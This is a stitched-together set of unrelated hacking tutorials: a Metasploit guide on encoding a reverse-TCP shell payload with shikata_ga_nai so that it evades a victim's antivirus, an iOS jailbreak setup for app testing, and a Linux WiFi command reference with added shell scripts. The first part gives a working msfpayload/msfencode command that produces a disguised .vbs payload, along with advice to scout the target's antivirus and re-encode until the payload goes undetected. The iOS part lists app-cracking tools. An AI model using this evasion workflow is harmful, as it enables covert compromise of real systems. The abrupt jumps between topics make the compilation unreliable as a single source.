I’ve written several listener guides on creating a malicious PDF or malicious Word document that would carry in it a payload with the Meterpreter, or reverse shell enabling you to own the system. One of the hurdles to using these techniques is the antivirus (AV) software on the target system. For instance, if you try to email a malicious PDF or Word doc, it’s likely that the victim system will alert the victim that it contains a virus or other malware.
The key lesson in this tutorial is how we can get past that antivirus software.

The Basics of How Antivirus Software Works

Antivirus software companies generally develop their software to look for a “signature” of viruses and other malware. In most instances, they look at the first few lines of code for a familiar pattern of known malware. When they find malware in the wild, they simply add its signature to their virus/malware database and when it next encounters that malware, the software alerts the computer owner.

How You Could Bypass Antivirus Software

Obviously, zero-day exploits, or malware that is brand new and has never been seen by the AV software companies, will pass right by such a detection scheme.
Another method of getting past the AV software is to simply change the “signature” of the malware. In other words, if we can change the encoding of the malware without changing its functionality, it should sail right past the AV software without detection. If you have the coding skills, you can re-code any malware and get this desired result.
If you don’t have these advanced coding skills, there is still hope! Metasploit has a built-in command called msfencode.

How to Change the Signature of Metasploit Payloads

In this tutorial, we will take a more in-depth look at this command and its capabilities for re-coding our payloads. A quick note before we get started—do your reconnaissance!
Find out what AV software the target system is using and re-encode to evade that AV package. No re-encoding scheme will work with all AV software, so don’t waste time developing a new encoding scheme that works with your AV software, but may not evade the target system’s AV software.
So, let’s open up BackTrack or Kali and fire up Metasploit!

Step 1: Use Msfencode

Let’s begin by simply typing msfencode at our prompt with the -h switch for help.
msfencode -h
As you can see, this displays all the key switches that we can use with this command. Note the -e switch. This designates the encoder we want to use to re-encode our payload.
Also, note the section I have highlighted with the -t switch. This switch determines what the output format is. You can see there are numerous formats including raw, ruby, perl, java, exe, vba, vbs, etc. Each of these outputs gives us an opportunity to change the signature and attempt to evade the AV software.

Step 2: List the Encoding Schemes

Next, let’s look at what encoders are available in msfencode.
msfencode -l
As this screenshot shows, msfencode includes numerous different encoding schemes. Fourth from the bottom we see “shikata_ga_nai.” Note that it is rated “excellent” and it’s a “Polymorphic XOR Additive Feedback Encoder.” Let’s take a look at that one.

What’s That Strange Sounding Encoder?

First, the strange-sounding name shikata_ga_nai is a Japanese phrase that loosely translates to “nothing can be done about it.” An excellent name for an encoder with bad intentions!
Second, it’s an additive XOR polymorphic encoder. Without going into too much detail, this means that it changes its shape/signature (polymorphic) by XORing the payload with a key that is updated byte by byte as the encoding proceeds (the “additive feedback”). XOR is far from a perfect encryption scheme, but it’s efficient and can quickly generate many different shapes/signatures, each of which the code decodes itself once it arrives at the target.

Step 3: Re-Code Our Payload

Now, let’s use shikata_ga_nai to re-encode our reverse TCP shell to get it past AV software. At the command prompt in BackTrack, type:
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.101 R | msfencode -e x86/shikata_ga_nai -c 20 -t vbs > /root/AVbypass.vbs

The Breakdown

Let’s take this command apart and see what it does.
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.101 R
The above part creates a payload with the reverse TCP shell for a local host at 192.168.1.101.
The “|”
This symbol means pipe that payload to the following command.
msfencode -e x86/shikata_ga_nai -c 20 -t vbs
Means re-encode that payload with shikata_ga_nai, run it through 20 iterations (-c 20), and then output it in the form of a .vbs script.
> /root/AVbypass.vbs
Means send the newly encoded payload to a file in the /root directory and name it AVbypass.vbs so that it appears to be a .vbs script.

The Result

When we run this command, we get the following output showing us that shikata_ga_nai is running our payload through 20 iterations (-c 20).
Now let’s go to the directory we told shikata_ga_nai to send our newly encoded payload to and check to see whether it is there.
cd /root
ls -l
As you can see, we now have a file in our root directory called AVbypass.vbs that we can test against the target’s AV software to see whether it detects it. This method works in most cases, but if it doesn’t, simply send the payload through a different number of iterations until you find an encoding that the AV software does not detect. Yea Buddy!
Now that you have your shiny new evasi0n7 jailbreak running, it’s time to set up the environment for application testing!

Getting in

Since Mobile Substrate is not working yet, we will focus on getting our iDevice up and running as a functioning *nix environment and installing some tools that don’t require Substrate.
First we need to get to our iDevice’s shell prompt. We will open Cydia (which is installed by default with the jailbreak) and install the OpenSSH package.
Once OpenSSH is installed you can SSH into your device; find its IP address in the Settings > Wireless Networks > Advanced “>” menu.
Now SSH into port 22 on that IP using the username “root” and the password “alpine”.
Once we have a shell we can use APT to install most of the other packages we need. Also change the default root password to something else so people can’t mess with your phone!

Arming your iDevice with *nix tools

To have a functioning *nix environment we need to install a ton of utilities that aren’t usually installed as part of the default jailbreak or Bash shell. This includes utilities like strings, grep, awk, find, etc.
Some of the package names do not say what they contain, e.g. bigbosshackertools (Big Boss tools) and com.ericasadun.utilities (Erica Sadun’s utilities).
These two in particular install strings and other binutils-type tools, several of them patched or modified to work on the iOS (ARM) architecture.
Packages (some of these will be pre-installed with the JB):
adv-cmds
apr
apr-lib
apr-util
apt
apt7
apt7-key
apt7-lib
apt7-ssl
base
bash
basic-cmds
berkeleydb
bigbosshackertools
bootstrap-cmds
bzip2
class-dump
com.ericasadun.utilities
com.evad3rs.evasi0n7
com.innoying.sbutils
coreutils
coreutils-bin
curl
cy+cpu.arm
cy+kernel.darwin
cy+lib.corefoundation
cy+model.ipad
cy+os.ios
cydia
cydia-lproj
darwintools
debianutils
developer-cmds
diffutils
diskdev-cmds
dpkg
expat
file
file-cmds
findutils
firmware
firmware-sbin
gawk
gdb
gettext
git
gnupg
grep
gzip
inetutils
iokittools
ldid
less
libffi
libxml2
libxml2-lib
lsof
lzma
make
nano
ncurses
neon
network-cmds
odcctools
openssh
openssl
org.thebigboss.repo.icons
p7zip
pam
pam-modules
patch
pcre
profile.d
python
readline
rsync
sed
shell-cmds
sqlite3
sqlite3-lib
subversion
system-cmds
tar
tcpdump
top
uikittools
unrar
unzip
uuid
vim
wget
whois
xar
xml2
zip
Take this list, dump it to a file (packages.txt) and run:
apt-get install $(<packages.txt)

Extras

In addition to utilities that help make our iDevice a functioning *nix environment there are several tools that aid in connecting, controlling, reverse engineering, and monitoring iOS applications. Below is a list of those tools, a description, and their locations (some cut from my OWASP page):
Tool | Link | Description
USBMuxd | http://cgit.sukimashita.com/usbmuxd.git/ | Tunnel ports over USB (enable SSH without network using localhost:2222)
libimobiledevice | http://www.libimobiledevice.org/ | Library. Custom implementation of iTunes-type connections, file-system access, system access.
Filemon |  | Monitor the iOS file system in real time
FileDP |  | Audits data protection of files
BinaryCookieReader |  | Read cookies.binarycookies files
lsof ARM binary |  | List all open files and the processes that opened them
lsock ARM binary |  | Monitor socket connections
removePIE |  | Disables ASLR of an application
Clutch | https://github.com/KJCracks/Clutch-dl/releases | Application cracker, compiled (removes encryption)
Rasticrac | https://twitter.com/iRastignac | Application cracker (Bash GDB wrapper)

Next Steps

This is just the basics.
Once you get all of these utilities and tools installed you’re pretty much waiting on Substrate to be working for iOS 7. After that’s done you can install your favorite all-encompassing or homegrown tool that uses Substrate to do hooking, such as Cycript, Inlyzer, SSLKillSwitch, Snoopit, IntroSpy, iAuditor, etc.
Then you just have to MitM the web traffic. There are plenty of guides on that around the net.
If you have other tools you use in your app assessment setup I’d love to hear about them. Feel free to leave suggestions in the comments.

Useful Linux WiFi Commands

NOTE: NOT ALL CARDS/FIRMWARE SUPPORT ALL OF THE COMMANDS LISTED BELOW.
Note: To connect your Linux machine to a WLAN using WPA, WPA2 or 802.1X you will need to use WPA Supplicant

Connecting to an OPEN / WEP WLAN (DHCP)

Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
  1. iwconfig [interface] mode managed key [WEP key] (128-bit WEP uses 26 hex characters, 64-bit WEP uses 10)
  2. iwconfig [interface] essid "[ESSID]" (Specify the ESSID for the WLAN)
  3. dhclient [interface] (to receive an IP address, netmask, DNS server and default gateway from the Access Point)
  4. ping www.bbc.co.uk (if you receive a reply you have access)

Connecting to an OPEN / WEP WLAN (Manual IP Setup)

Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
It may be necessary to run some packet capture software (e.g. Ethereal) to determine the IP addresses of both the default gateway and the DNS servers.
  1. iwconfig [interface] mode managed key [WEP key] (128-bit WEP uses 26 hex characters, 64-bit WEP uses 10)
  2. iwconfig [interface] essid "[ESSID]"
  3. ifconfig [interface] [IP address] netmask [subnetmask]
  4. route add default gw [IP of default gateway] (Configure your default gateway; usually the IP of the Access Point)
  5. echo "nameserver [IP address of DNS server]" >> /etc/resolv.conf (Configure your DNS server; note the file is resolv.conf, not resolve.conf)
  6. ping www.bbc.co.uk (if you receive a reply you have access)
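The two procedures above (DHCP and manual IP setup) wrapped in shell functions, as an added example that is not part of the original post. It adds a sanity check on the WEP key length before it reaches iwconfig, writes to the correctly spelled /etc/resolv.conf, and defaults to DRY_RUN=1, so the privileged commands are printed rather than executed; the interface name, ESSID and addresses in the demo at the bottom are made up.

```shell
#!/bin/sh
# Added example (not from the original post): wraps the OPEN/WEP connection
# steps (DHCP and manual variants) in functions with a WEP key sanity check.
# DRY_RUN=1 (the default) prints the privileged commands instead of running them.
DRY_RUN="${DRY_RUN:-1}"

run() {
    if [ "$DRY_RUN" = "1" ]; then
        printf '[dry-run] %s\n' "$*"
    else
        "$@"
    fi
}

# A hex WEP key is 10 digits (64-bit) or 26 digits (128-bit); anything else
# is rejected here rather than handed to iwconfig.
wep_key_valid() {
    case "$1" in
        "" | *[!0-9A-Fa-f]*) return 1 ;;
    esac
    case "${#1}" in
        10 | 26) return 0 ;;
        *) return 1 ;;
    esac
}

# Steps 1-2: managed mode, optional WEP key, ESSID.
associate() {
    iface="$1"; essid="$2"; key="${3:-}"
    if [ -n "$key" ]; then
        wep_key_valid "$key" || { echo "invalid WEP key: expected 10 or 26 hex digits" >&2; return 1; }
        run iwconfig "$iface" mode managed key "$key"
    else
        run iwconfig "$iface" mode managed key off   # open network: no key
    fi
    run iwconfig "$iface" essid "$essid"
}

# DHCP variant: associate, then let dhclient fetch IP, netmask, DNS and gateway.
connect_dhcp() {
    associate "$1" "$2" "${3:-}" || return 1
    run dhclient "$1"
    run ping -c 3 www.bbc.co.uk
}

# Manual variant: associate, then set address, gateway and DNS by hand.
# connect_static IFACE ESSID IP NETMASK GATEWAY DNS [WEPKEY]
connect_static() {
    iface="$1"; essid="$2"; ip="$3"; mask="$4"; gw="$5"; dns="$6"; key="${7:-}"
    associate "$iface" "$essid" "$key" || return 1
    run ifconfig "$iface" "$ip" netmask "$mask"
    run route add default gw "$gw"
    # The resolver file is /etc/resolv.conf (no trailing "e").
    if [ "$DRY_RUN" = "1" ]; then
        printf '[dry-run] echo "nameserver %s" >> /etc/resolv.conf\n' "$dns"
    else
        echo "nameserver $dns" >> /etc/resolv.conf
    fi
    run ping -c 3 www.bbc.co.uk
}

# Usage (dry run, made-up values): sh wlan.sh demo
if [ "${1:-}" = "demo" ]; then
    connect_dhcp wlan0 "MyNetwork" 0123456789
    connect_static wlan0 "MyNetwork" 192.168.1.50 255.255.255.0 192.168.1.1 192.168.1.1
fi
```

Run with DRY_RUN=0 as root to execute the commands for real; the key check means a mistyped WEP key fails fast instead of leaving the card associated with no usable key.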

iwconfig Commands

Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
  • iwconfig [interface] mode master (set the card to act as an access point mode)
  • iwconfig [interface] mode managed (set card to client mode on a network with an access point)
  • iwconfig [interface] mode ad-hoc (set card to peer to peer networking or no access point mode)
  • iwconfig [interface] mode monitor (set card to RFMON/monitor mode, our favourite)
  • iwconfig [interface] essid any (with some cards you may disable the ESSID checking)
  • iwconfig [interface] essid "your ssid_here" (configure ESSID for network)
  • iwconfig [interface] key 1111-1111-1111-1111 (set 128 bit WEP key)
  • iwconfig [interface] key 11111111 (set 64 bit WEP key)
  • iwconfig [interface] key s:mykey (set key as an ASCII string)
  • iwconfig [interface] key off (disable WEP key)
  • iwconfig [interface] key open (sets open mode, no authentication is used and card may accept non-encrypted sessions)
  • iwconfig [interface] channel [channel no.] (set a channel 1-14)
  • iwconfig [interface] channel auto (automatic channel selection)
  • iwconfig [interface] freq 2.422G (channels can also be specified in GHz)
  • iwconfig [interface] ap 11:11:11:11:11:11 (Force card to register AP address)
  • iwconfig [interface] rate 11M (card will use the rate specified)
  • iwconfig [interface] rate auto (select automatic rate)
  • iwconfig [interface] rate auto 5.5M (card will use the rate specified and any rate below as required)

ifconfig Commands

Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
ifconfig [interface] up (bring up specified interface)
ifconfig [interface] down (take down specified interface)
ifconfig [interface] [IP address] netmask [subnet-mask] (manually set IP and subnet-mask details)
ifconfig [interface] hw ether [MAC] (Change the wireless card’s MAC address, specified in the format 11:11:11:11:11:11)

iwpriv Commands

Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
  • iwpriv [interface] hostapd 1 (used to set card mode to hostapd e.g. for void11)
When the monitor mode patch is installed as per the Wireless Build HOWTO the following commands may be used to set the card into monitor mode.
  • iwpriv [interface] monitor [A] [B]
    • [A]
      • 0 = disable monitor mode
      • 1 = enable monitor mode with Prism2 header
      • 2 = enable monitor mode with no Prism2
    • [B]
      • Channel to monitor (1-14)

iwlist Commands

Note: replace [interface] with your interface name as required (e.g. eth1, wlan0, ath0 etc.)
iwlist is used to display additional information from a wireless network interface that iwconfig does not show.
  • iwlist [interface] scan (Give the list of Access Points and Ad-Hoc cells in range (ESSID, Quality, Frequency, Mode etc.) Note: In tests only worked with Atheros cards).
  • iwlist [interface] channel (Give the list of available frequencies in the device and the number of channels).
  • iwlist [interface] rate (List the bit-rates supported by the device).
  • iwlist [interface] key (List the encryption key sizes supported and display all the encryption keys available in the device).
  • iwlist [interface] power (List the various Power Management attributes and modes of the device).
  • iwlist [interface] txpower (List the various Transmit Power available on the device).
  • iwlist [interface] retry (List the transmit retry limits and retry lifetime on the device).
  • iwlist [interface] ap (Give the list of Access Points in range, and optionally the quality of link to them. Deprecated in favour of scan)
  • iwlist [interface] peers (Give the list of Peers associated/registered with this card).
  • iwlist [interface] event (List the wireless events supported by this card).
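An added example, not from the original post, that turns the output of iwlist [interface] scan into a one-line-per-cell inventory (ESSID|BSSID|channel|security) and filters out the open and WEP cells, which is the quick way to spot networks that should not exist during a site survey. The scan text embedded below is constructed to follow the wireless-tools layout (Cell / Address / Channel / Encryption key / ESSID / IE lines); it is not captured from a real network, and the MAC addresses and ESSIDs are invented.

```shell
#!/bin/sh
# Added example (not from the original post): parse "iwlist [interface] scan"
# output into ESSID|BSSID|channel|security lines and flag weak cells.
# SAMPLE_SCAN is constructed to match wireless-tools' layout; made-up values.
SAMPLE_SCAN='wlan0     Scan completed :
          Cell 01 - Address: 00:11:22:33:44:55
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=70/70  Signal level=-38 dBm
                    Encryption key:on
                    ESSID:"HomeNet"
                    Mode:Master
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
                        Pairwise Ciphers (1) : CCMP
                        Authentication Suites (1) : PSK
          Cell 02 - Address: 66:77:88:99:AA:BB
                    Channel:11
                    Frequency:2.462 GHz (Channel 11)
                    Quality=50/70  Signal level=-60 dBm
                    Encryption key:off
                    ESSID:"CoffeeShop"
                    Mode:Master
          Cell 03 - Address: CC:DD:EE:FF:00:11
                    Channel:1
                    Frequency:2.412 GHz (Channel 1)
                    Quality=30/70  Signal level=-75 dBm
                    Encryption key:on
                    ESSID:"LegacyNet"
                    Mode:Master'

# Reads iwlist scan output on stdin; prints one ESSID|BSSID|channel|security
# line per cell. "Encryption key:on" with no WPA/WPA2 IE is reported as WEP.
parse_iwlist_scan() {
    awk '
        function flush() {
            if (addr == "") return
            if (enc == "off")    sec = "open"
            else if (sec == "")  sec = "WEP"
            print essid "|" addr "|" chan "|" sec
            addr = ""; chan = ""; enc = ""; sec = ""; essid = ""
        }
        /Cell [0-9]+ - Address:/  { flush(); addr = $NF }
        /^[ \t]*Channel:/         { sub(/^[ \t]*Channel:/, ""); chan = $0 }
        /Encryption key:/         { enc = ($0 ~ /key:on/) ? "on" : "off" }
        /IE: IEEE 802\.11i\/WPA2/ { sec = "WPA2" }
        /IE: WPA Version/         { if (sec == "") sec = "WPA" }
        /^[ \t]*ESSID:/           { sub(/^[ \t]*ESSID:"/, ""); sub(/"[ \t]*$/, ""); essid = $0 }
        END { flush() }
    '
}

# Keeps only cells whose security column is "open" or "WEP".
weak_networks() {
    parse_iwlist_scan | awk -F'|' '$4 == "open" || $4 == "WEP"'
}

# Usage: iwlist wlan0 scan | sh scan-inventory.sh   (or "demo" for the sample)
if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_SCAN" | parse_iwlist_scan
elif [ ! -t 0 ] && [ $# -eq 0 ]; then
    weak_networks
fi
```

On a real card pipe iwlist [interface] scan into the script; as the note above says, scanning only worked with Atheros cards in the author’s tests, so an empty result may mean an unsupported driver rather than an empty airspace.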

Madwifi-ng Commands

MADWiFi supports virtual access points (VAPS), which means you can create more than one wireless device per wireless card (the host wireless card = wifi0).
By default, a sta mode VAP is created, which is MadWifi talk for a ‘managed mode wireless interface’.
Note: replace athx with your interface name as required (e.g. ath0, ath1)
  • wlanconfig athx destroy (Destroy VAP, athx)
  • wlanconfig athx create wlandev wifi0 wlanmode sta (Create a managed mode VAP, athx)
  • wlanconfig athx create wlandev wifi0 wlanmode ap (Create an Access Point VAP, athx)
  • wlanconfig athx create wlandev wifi0 wlanmode adhoc (Create an Ad-Hoc VAP, athx)
  • wlanconfig athx create wlandev wifi0 wlanmode monitor (Create a Monitor mode VAP, athx)
  • Changing modes:
    • ifconfig athx down (Take the VAP down)
    • wlanconfig athx destroy (Destroy the VAP, athx)
    • wlanconfig athx create wlandev wifi0 wlanmode [sta|adhoc|ap|monitor] (Create a new sta, adhoc, ap or monitor VAP)
  • Scan for Access Points (requires both steps):
    • modprobe wlan_scan_sta (To insert the scanning module)
    • wlanconfig athx list scan (To list the APs)